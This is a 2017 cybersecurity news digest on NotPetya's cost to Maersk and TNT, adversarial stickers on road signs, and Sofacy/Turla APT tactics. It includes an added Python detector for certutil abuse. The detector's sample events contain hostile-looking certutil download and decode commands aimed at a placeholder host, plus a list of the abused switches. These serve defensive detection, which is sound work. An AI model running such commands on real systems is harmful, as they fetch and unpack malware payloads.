Maersk Previews NotPetya Impact: Up to $300 Million
Self-Driving Cars Can Be Hacked By Just Putting Stickers On Street Signs
Updates to Sofacy, Turla Highlight 2017 Q2 APT Activity
Customers 'furious' with TNT after cyber-attack meltdown
Latest Cyber Security News
About the Cyber Security News Update
The Cyber News Update is an activity of the Cyber Research Center - Industrial Control Systems and is intended to reach out to all Cyber Security Professionals interested in industrial / critical infrastructure threats, protection & resilience. For more information visit the CRC-ICS website at www.crc-ics.net or www.cyber-research-center.net
Maersk Previews NotPetya Impact: Up to $300 Million
August 17, 2017
Danish shipping giant A.P. Møller - Maersk faces a loss of up to $300 million as a result of the NotPetya global malware outbreak.
After NotPetya infected systems at Maersk, the world's biggest shipping firm had to reroute ships and was unable to dock or unload cargo ships in dozens of ports.
"In the last week of the quarter we were hit by a cyberattack, which mainly impacted Maersk Line, APM Terminals and Damco," Maersk CEO Søren Skou said in an interim report issued Wednesday. "Business volumes were negatively affected for a couple of weeks in July. We expect that the cyberattack will impact results negatively by $200-$300 million."
The malware known as NotPetya - aka SortaPetya, Petna, ExPetr, GoldenEye, Nyetya, Diskcoder.C - hit organizations beginning June 27. Cyber police in Ukraine, as well as such security firms as Cisco Talos, ESET, Microsoft and Symantec, have said the attacks were facilitated by a "cunning backdoor" added to widely used accounting software (see NotPetya Patient Zero: Ukrainian Accounting Software). From there, NotPetya spread to businesses with Ukraine-based offices or business partners, in part by targeting an SMB flaw that Microsoft had patched prior to the NotPetya outbreak. But NotPetya could also spread via two legitimate Windows tools - PsExec and Windows Management Instrumentation - as well as use the open source Mimikatz tool to attempt to steal passwords from infected systems (see Ransomware Smackdown: NotPetya Not as Bad as WannaCry).
Ukraine Hit Hard
Organizations in Ukraine, including government agencies, appear to have experienced the brunt of NotPetya infections. The Ukrainian government has yet to detail in full the costs, outages or cleanup - some of which likely continues. But it has blamed the attack on Russia.
Ukraine, Russia, Poland, Italy and Germany appeared to suffer the greatest number of related infections, according to one security firm. Organizations around the world, however, were disrupted. They include Britain's WPP - the world's biggest advertising agency, Russian oil giant Rosneft, international law firm DLA Piper and French construction materials company Saint-Gobain.
U.S.-based organizations also reported disruptions, including snacks business Mondelez, whose brands include Oreos, Cadbury and Toblerone; pharmaceutical giant Merck; and Pennsylvania-based Heritage Valley Health System.
Maersk Lauded for Transparency
Unlike many other affected organizations, however, Maersk has been ultra-transparent about its NotPetya disruptions and cleanup efforts. The company first warned on June 28 that it had been hit by NotPetya and has continued to issue regular updates.
Mikko Hypponen, chief research officer of Finnish security firm F-Secure, last month said Maersk exemplifies the right way to handle crisis communications. Its choice to emphasize transparency also stands in sharp contrast to how many firms, even publicly traded ones, choose to handle post-attack communications with customers or users, whether as a result of NotPetya or other incidents (see Breach Transparency Kudos to Hacked Kiosk Maker).
Crisis communication experts, take note. The Maersk case is going to be textbook material on how to do it right. #Petya https://t.co/byyg2MBLoO
— Mikko Hypponen (@mikko) July 12, 2017
More Cleanup Costs Come to Light
While Maersk may be on the leading edge of communicating its NotPetya incident response efforts, further details about other organizations' disruptions and incident response efforts continue to come to light.
More info: https://www.bankinfosecurity.com/maersk-previews-notpetya-impact-up-to-300-million-a-10203
Self-Driving Cars Can Be Hacked By Just Putting Stickers On Street Signs
August 7, 2017
Car hacking is a hot topic, though it's not new for researchers to hack cars. Previously they had demonstrated how to hijack a car remotely, how to disable a car's crucial functions like airbags, and even how to steal cars.
But the latest car hacking trick doesn't require any extraordinary skills to accomplish. All it takes is a simple sticker on a sign board to confuse a self-driving car and cause accidents.
Isn’t this so
A team of researchers from the University of Washington demonstrated how anyone could print stickers off at home and put them on a few road signs to convince "most" autonomous cars into misidentifying road signs and cause accidents.
According to the researchers, the image recognition systems used by most autonomous cars fail to read road signs if the signs are altered by placing stickers or posters over part or all of the sign board.
In a research paper, titled "Robust Physical-World Attacks on Machine Learning Models," the researchers demonstrated several ways to disrupt the way autonomous cars read and classify road signs using just a colour printer and a camera.
By simply adding "Love" and "Hate" graphics onto a "STOP" sign (as shown in the figure), the researchers were able to trick the autonomous car's image-detecting algorithms into thinking it was just a Speed Limit 45 sign in 100 percent of test cases.
The researchers also performed the same exact test on a RIGHT TURN sign and found that the cars wrongly classified it as a STOP sign two-thirds of the time.
The researchers did not stop there. They also applied smaller stickers onto a STOP sign to camouflage the visual disturbances, and the car identified it as street art in 100 percent of test cases.
"We [think] that given the similar appearance of warning signs, small perturbations are sufficient to confuse the classifier," the researchers told Car and Driver. "In future work, we plan to explore this hypothesis with targeted classification attacks on other warning signs."
The sign alterations in all the experiments performed by the researchers were small enough to go unnoticed by humans, but since the camera's software was using an algorithm to understand the image, it interpreted the sign in a profoundly different way.
This small alteration to the signs could result in cars skipping junctions and potentially crashing into one another.
Read more: http://thehackernews.com/2017/08/self-driving-car-hacking.html
Updates to Sofacy, Turla Highlight 2017 Q2 APT Activity
August 8, 2017
Attackers behind advanced persistent threat campaigns have kept busy over the past several months, adding new ways to bypass detection, crafting new payloads to drop, and identifying new zero days and backdoors to help them infect users and maintain persistence.
Juan Andres Guerrero-Saade and Brian Bartholomew, members of Kaspersky Lab's Global Research and Analysis Team, described some of the tactics the researchers have seen in Q2 2017 in a webinar Tuesday morning. The company used the webinar and the quarterly report it was based on to help pull back the veil on threats previously covered by its private intelligence.
A chunk of the presentation was spent recapping tweaks recently made by Russian-speaking groups Sofacy and Turla.
Sofacy, the group implicated in election hacks by a December DHS report, began using two new macro techniques in April. One abused Windows' certutil utility to extract payloads, the first time the researchers had seen that technique used; the other embedded payloads in the EXIF metadata of malicious Office documents.
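As an added illustration of how a defender could surface the certutil payload-extraction technique described above (this is example code written for this newsletter, not Kaspersky's or Sofacy's), the following Python scans constructed Sysmon-style process-creation events for certutil invoked with decode or download switches and rates invocations spawned by an Office parent highest. The field names and the sample events are assumptions.

```python
"""Flag certutil.exe used as a decoder/downloader in process-creation telemetry.

Assumption: each log line is a JSON object with Sysmon-like fields
"Image", "ParentImage" and "CommandLine". Sample lines are constructed.
"""
import json
import ntpath
import shlex

# Office binaries: a macro that launches certutil will appear under one of these
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# certutil switches that turn the certificate tool into a decoder or downloader
DECODE_SWITCHES = {"decode", "decodehex", "urlcache", "encode"}

# Constructed sample events (not real telemetry); raw strings keep the JSON escapes intact
SAMPLE_EVENTS = [
    r'{"Image":"C:\\Windows\\System32\\certutil.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"certutil.exe -decode C:\\Users\\u\\AppData\\Local\\Temp\\img.txt C:\\Users\\u\\AppData\\Local\\Temp\\upd.exe"}',
    r'{"Image":"C:\\Windows\\System32\\certutil.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"certutil -urlcache -split -f http://example.invalid/a.txt a.txt"}',
    r'{"Image":"C:\\Windows\\System32\\certutil.exe","ParentImage":"C:\\Windows\\System32\\services.exe","CommandLine":"certutil.exe -verify cert.cer"}',
    r'{"Image":"C:\\Windows\\System32\\certutil.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","CommandLine":"\"C:\\Windows\\System32\\certutil.exe\" /decode \"C:\\Users\\u\\Pictures\\photo.jpg\" out.dll"}',
    "this line is not JSON and must be skipped",
]


def parse(line):
    """Return the event dict for a JSON log line, or None for unparseable lines."""
    try:
        return json.loads(line)
    except json.JSONDecodeError:
        return None


def normalize_switches(cmdline):
    """Collect switches from a Windows command line, accepting both -x and /x forms."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep quotes, no backslash escapes
    except ValueError:
        tokens = cmdline.split()
    switches = set()
    for tok in tokens:
        tok = tok.strip('"').lower()
        if len(tok) > 1 and tok[0] in "-/":
            switches.add(tok[1:])
    return switches


def classify(event):
    """Return a finding dict if the event is certutil used to decode/download, else None."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image != "certutil.exe":
        return None
    hits = normalize_switches(event.get("CommandLine", "")) & DECODE_SWITCHES
    if not hits:
        return None  # -verify, -dump, etc. are ordinary certificate-management uses
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    # An Office parent matches the macro-driven use described in the report
    severity = "high" if parent in OFFICE_PARENTS else "medium"
    return {"severity": severity, "parent": parent, "switches": sorted(hits),
            "cmdline": event.get("CommandLine", "")}


def scan(lines):
    """Run classify() over every parseable event and return the findings in order."""
    findings = []
    for line in lines:
        event = parse(line)
        if event is None:
            continue
        finding = classify(event)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["parent"], f["switches"], f["cmdline"])
```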
"After we started digging into this we found that they were actually using this technique dating back to December 2016," Bartholomew said, adding that what made the techniques interesting is that they were used to target French political party members prior to the French election on April 23 and May 7.
In June, the researchers noticed that Sofacy had updated a payload, written in Delphi, called Zebrocy. The new iteration, version 5.1 of Zebrocy, implemented new encryption keys and minor string obfuscations, something which helps it bypass detection capabilities, Bartholomew said.
Bartholomew said the researchers were able to tie Zebrocy to Sofacy in mid-2016.
"There were some infrastructure ties there," Bartholomew said. "There was also another payload called Delphocy that was also written in Delphi. In late 2015 we started seeing Delphi payloads pop up from this group, which we hadn't seen before. We don't know why that's the case, it could be that they hired a developer who just refuses to write anything but Delphi. Either way, once Zebrocy was discovered, it was found in parallel to another Sofacy infection, once we started digging into it there was a little bit of shared code in the Delphi—compared to the other Delphocy payload—and ties to the infrastructure to Sofacy."
Earlier this spring the researchers said they were able to make a potential link between Turla, the APT linked to Moonlight Maze at SAS earlier this year, and Sofacy. Like Sofacy was doing around the same time, Turla was spotted using an EPS zero day (CVE-2017-0261) to target foreign ministries and governments.
"What's interesting about that is that it may actually indicate a shared supply chain between Turla and Sofacy," Bartholomew said.
Bartholomew also took time on Tuesday to discuss BlackOasis, a Middle Eastern group that's believed to be a client of Gamma Group, the UK-based firm that specializes in surveillance and monitoring equipment, such as FinFisher.
He claims the group, which he's spent the better chunk of a year and a half researching, has been spotted using several zero days in the past, including CVE-2016-4117, CVE-2016-0984, and CVE-2015-5119. Bartholomew says that what makes it interesting is that the group was the first seen using CVE-2017-0199, an OLE2Link zero-day, in the wild before it was detected. The exploit's end payload, he adds, is a new variant of FinSpy heavily fortified to prevent analysis by researchers.
"We're currently trying to look into that, write some decryptors for it and will probably write another report on that in the next couple of months," Bartholomew said.
Citing their technical sophistication and development, Guerrero-Saade was eager to discuss a crop of English-speaking APT actors, including those behind an Equation Group backdoor, EQUATIONVECTOR. While the backdoor has been around since 2006, Guerrero-Saade said what makes it interesting is the fact that it's the first example of a NOBUS—NObody But US backdoor—they've seen in the wild. The backdoor, a passive and active staging backdoor, could be used to execute shellcode payloads, according to the researcher.
Another backdoor, Gray Lambert—an extension of the Lamberts APT group—is a much more modern implementation, Guerrero-Saade said. It waits, sleeps, and sniffs the network until it's ready to be used.
"What makes this NOBUS backdoor particularly interesting is that it provides attackers with a sort of surgical precision over a network of multiple infected machines," Guerrero-Saade said. "With Gray Lambert installed on these machines [attackers] can essentially decide how they're going to space their payloads, their commands and attacks."
The researchers suggest that users should expect more of the same tactics, techniques, and procedures (TTPs) from APT groups going forward. It's likely countries that have upcoming elections, Germany and Norway for example, will become targets for misinformation campaigns like the one mounted by the Sofacy group. Controversial lawful surveillance tools, like those peddled by the Gamma Group to BlackOasis and those sold by the NSO Group to the Mexican government, will remain popular as well, Guerrero-Saade and Bartholomew said.
The trend of destructive malware disguised as ransomware will likely continue as well, Guerrero-Saade says, but he admits it's a curious question whether or not the technique will ever be embraced by cybercriminals.
"We've been talking about incompetent people entering the ransomware space for quite some time now," Guerrero-Saade said. "We're going to see people who are poor coders and won't even bother to buy an already prepared kit, just essentially trying to leverage something that deletes all the files, or doesn't do anything but tries to get money out of naïve or unsuspecting victims. The notion of wipers as ransomware is quite different. It's an interesting phenomenon."
"Sabotage attacks and wiper attacks are a strange occurrence, they don't happen that often. I think over the past 10 years we've looked at 10 cases tops. They're very rare components. For the most part I think it has to do with the level of access that you're burning whenever you use them," Guerrero-Saade said. "If you're a cyberespionage actor, if you have access to a network at that point, a Sony or Saudi Aramco, where you can target thousands of machines, the idea of burning that loudly, raising the security profile of the organization as a whole and creating public fallout is extremely costly. It's a strange circumstance where the calculus pays off."
While it may not be a popular technique for cybercriminals on a lower level, Guerrero-Saade said, it's not out of the realm of possibility for APT gangs to continue to use the vector to create havoc.
"Let's say we have all the means for a sabotage attack and we want to disguise it as ransomware or as something potentially treatable, it's not necessarily that different from what the Lazarus Group did with Sony, or some other South Korean targets, where first they asked for money and then dumped data anyways. It's an evolution that's particularly troubling," Guerrero-Saade said.
More info: https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/
Customers 'furious' with TNT after cyber-attack meltdown
August 9, 2017
When Leah Charpentier ordered a vintage coffee table on 8 June - a birthday present for her brother - she didn't think it would take more than six weeks to be delivered.
She also didn't expect the furniture to arrive with one of its casters broken off.
This particular coffee table was just one of hundreds of thousands of items caught up in an extraordinary meltdown at courier TNT, which was badly affected by the NotPetya cyber-attack that hit many companies around the world on 28 June.
Businesses in Ukraine were hit hardest, and since many TNT operations and communications are based in the country, a significant proportion of its systems were infiltrated and data encrypted - locking employees out - as a result.
"Manual processes" are still being
used to put packages through the system, and TNT says it is
"reasonably possible" that some information will never be fully
The BBC has spoken to several customers who have had exasperating experiences with the courier, which is owned by FedEx.
Small businesses have been affected too - some say they have lost thousands of pounds because of missing or waylaid deliveries.
And a source close to FedEx and TNT operations in Europe has told the BBC that depots have been pushed to their limit while both companies continue to try to get the backlog of packages under control.
Ms Charpentier's coffee table faced the disruption of the cyber-attack after its initial delivery had been delayed because of its size.
But when it arrived late to its destination in London following the extended delay, her brother was not expecting the delivery and so was out at the time. The furniture was shipped back to Rome and then sent out again via another courier, DHL.
Ms Charpentier still doesn't know who is responsible for the broken leg, but because of the confusion and the fact that the table was sent back to Italy without TNT contacting her first, she says: "I'm still furious at TNT."
Total shipping costs were 150 euros (£135), and Ms Charpentier says she might have to spend a further 180 euros to get the furniture repaired.
Since the cyber-attack, FedEx itself has been processing large volumes of orders as a contingency, but the BBC understands that this has put the company itself under huge strain.
A source with knowledge of operations in Europe says that until very recently some depots were finishing the day with tens of thousands of packages still waiting to be processed, instead of just a handful as usual.
"They didn't have enough loading units to face this," the source says. "It was crazy."
The source adds that some physical hardware - such as conveyor belts - was having to be fixed much more frequently than usual because of the stress caused by increased volumes.
And at one point, staff had to use WhatsApp Messenger for internal communications as company email was inaccessible, the source adds.
'Medical supplies delayed'
The sheer range of customers affected by the breakdown in operations at TNT is staggering - some were left distraught as critical supplies were held up in transit.
"We have urgent air freight stuck at Stansted [airport]," wrote one woman on the courier's Facebook page, "medical equipment required in theatres."
In another case, TNT narrowly missed depriving a bride of her dress on her wedding day, according to the staff at Dolly Blue Bridal Studios in Shrewsbury.
"It was just a complete nightmare," says Adele Nortcliffe.
After many calls to trace missing deliveries, TNT eventually sent an overnight courier to deliver the dress.
"We got a dress on the Thursday and the wedding was on the Saturday," Ms Nortcliffe says.
Others haven't been so lucky.
Mark Hammersley runs Staffordshire Wrought Iron, a small business that makes gates and other metal fittings.
"We lost £900 on Monday," he says, describing how customers who are unable to track orders - a side-effect of the IT issues - have been able to claim refunds via PayPal but also keep their items if they do arrive.
Despite having used TNT for six years, Mr Hammersley says he is now planning to switch couriers.
The list of cases goes on. One student told the BBC that after their computer had broken they ordered new memory to fix it so they could finish an assignment on time.
When it was delayed, they had had to borrow a friend's laptop to meet the deadline.
And one man waited a month for a shower screen that was supposed to arrive within five days - it materialised only after a series of poorly co-ordinated delivery attempts.
It's nearly a month and a half since NotPetya struck, but TNT has still not recovered.
The last update from the company was published on 17 July. It said all TNT depots, hubs and facilities were operational, but added: "Customers are still experiencing widespread service and invoicing delays, and manual processes are being used to facilitate a significant portion of TNT operations and customer service functions.
"We cannot estimate when TNT services will be fully restored."
A spokesman for an online cycling retailer told the BBC it was shipping freight beyond Europe via another courier, as TNT had said only deliveries within the EU could be processed.
After the BBC contacted TNT for comment on 7
August, the company sent through some lines copied almost verbatim from
its 17 July notice, adding: "We cannot express strongly enough how
much we appreciate our customers' patience and understanding through this
Individuals at Risk
Suck Up Data About You. Where Does It All Go?: Automakers, local governments, retailers, insurers and tech companies are looking to leverage the data that cars generate. New York Times, July 27, 2017
Android malware records calls, intercepts texts, and steals credit card info: A new version of Faketoken was identified by Kaspersky and poses a huge threat to anyone who stores bank card information for in-app purchases. TechRepublic, Aug 18, 2017
your smartphone? Replacement parts can hijack phone security, steal passwords: Booby-trapped touchscreens can log passwords, install malicious apps, and more. Ars Technica, Aug 18, 2017
Information Security Management in the Organization
Information Security Management and Governance
Hack Illustrates That It's Hard to Tell Exactly What's Been Compromised: There may be much more missing than the headlines suggest. Robert Braun, SecureTheVillage Leadership Council, Cybersecurity Lawyer Forum, Jeffer Mangels Butler & Mitchell, Aug 17, 2017
Survey Finds Failure to Remove Access from ex-Employees a Major Contributor to Breaches: Businesses drive the risk for data breaches when they fail to terminate employees' access to corporate apps after they leave. DarkReading, Aug 18, 2017
Cyber breach at shipper illustrates dangers of business email compromise: Weak defences are leaving cargo vessels vulnerable to cyber-attacks, say experts. BBC, Aug 18, 2017
The importance of network segmentation as a key network security strategy: Cybercrime is getting worse. Keep your company safe by following the latest recommendations in network security. Inc, August 18, 2017
Caution advised with information security surveys: Cybersecurity reports based on answers from respondents often produce misleading or inaccurate statistics, and they can lead to industry confusion. CSO, August 15, 2017
found exploiting a vulnerability that Microsoft patched in April. Update now!!!: Attackers are targeting companies, and their goal is to get their hands on information that will allow them to steal money from the victims' accounts. HelpNetSecurity, Aug 18, 2017
in New York and Colorado Cybersecurity Regulations: For the first time since New York's Cybersecurity Regulation (23 NYCRR Part 500) became effective on March 1, 2017, the Department of Financial Services (DFS) has issued Frequently Asked Questions to assist Covered Entities in their compliance and provide guidance into the DFS's interpretation and enforcement of its newly adopted regulation. National Law Review, Aug 18, 2017
Cyber Security in Society
says impact of NotPetya may be as much as $300 Million: Danish shipping giant A.P. Møller - Maersk faces a loss of up to $300 million as a result of the NotPetya global malware outbreak. BankInfoSecurity, Aug 17, 2017
Department wants data on anti-Trump protesters. An L.A. tech firm is resisting: Los Angeles tech company is resisting a federal demand for more than 1.3 million IP addresses to identify who visited a website set up to coordinate protests on President Trump's Inauguration Day, a request whose breadth the company says violates the Constitution. LA Times, Aug 15, 2017
the New York hospital hackers took down for six weeks (video): The medical industry is the new No. 1 target for hackers. CBS News, Aug 18, 2017
Macie automates cloud data protection with machine learning. Can it catch Microsoft and Google?: Amazon promises AWS S3 customers that they will be able to identify and protect sensitive data faster with Macie, but is it enough to catch up to what Microsoft and Google offer? CSO, Aug 17, 2017
LA launches public-private CyberLab to share threat information with region's businesses: The new tech platform and public-private partnership aims to protect critical IT infrastructure and aid businesses to fight cyberattacks in real time. StateScoop, Aug 16, 2017
Know Your Enemy
cloud cybersecurity attacks up 300% in last year, report says: In volume 22 of Microsoft's Security Intelligence Report, the Redmond giant outlined some of the biggest cyberthreats facing its users. TechRepublic, Aug
Ukraine, a Malware Expert Who Could Blow the Whistle on Russian Hacking: For the first time, an actual witness has emerged in the hack of the Democratic National Committee, and he has been interviewed by the F.B.I. New York Times, Aug 16, 2017
New York Times get the story wrong about Ukraine malware expert: It's a good read, as long as you can ignore that the premise of the piece is completely wrong. KrebsOnSecurity, Aug 18, 2017
Backup of Chicago Voter Roll Found in Cloud. 1.8 Million Voter Records At-Risk: Voter registration data belonging to the entirety of Chicago's electoral roll (1.8 million records) was found a week ago in an Amazon Web Services bucket configured for public access. ThreatPost, Aug 18, 2017
APT Group Said to Be Engaged in G20 Themed Attack: Turla, a long operating advanced persistent threat group (APT) with presumed ties to the Russian government, appears to be actively targeting G20 participants and those interested in its activities including policymakers, member nations and journalists. DarkReading, Aug 18, 2017
cybersecurity review for state and local government approaches: Non-federal agencies still ride low on the maturity benchmark, but the increased political attention around cybersecurity could improve results in the coming survey period. StateScoop, Aug 18, 2017
Why information security is a patient safety issue: Cybersecurity requires strategy to succeed and that means putting your priorities in the right place. CISOs and other infosec pros must up their game to make protecting patients the top concern. Healthcare IT News, Aug 15, 2017
The content of this CRC-ICS Cyber News Update is provided for information purposes only. No claim is made as to the accuracy or authenticity of the content of this news update or incorporated into it by reference. No responsibility is taken for any information or services which may appear on any linked websites. The information provided is for individual expert use only.
Founded in 2015, the Cyber Research Center - Industrial Control Systems is a not-for-profit research & information sharing research center working on the future state of Physical & Cyber Protection and Resilience. CRC-ICS goals are to inform industries / critical infrastructures about the fast changing threats they are facing and the measures, controls and techniques that can be implemented to be prepared to deal with these cyber threats.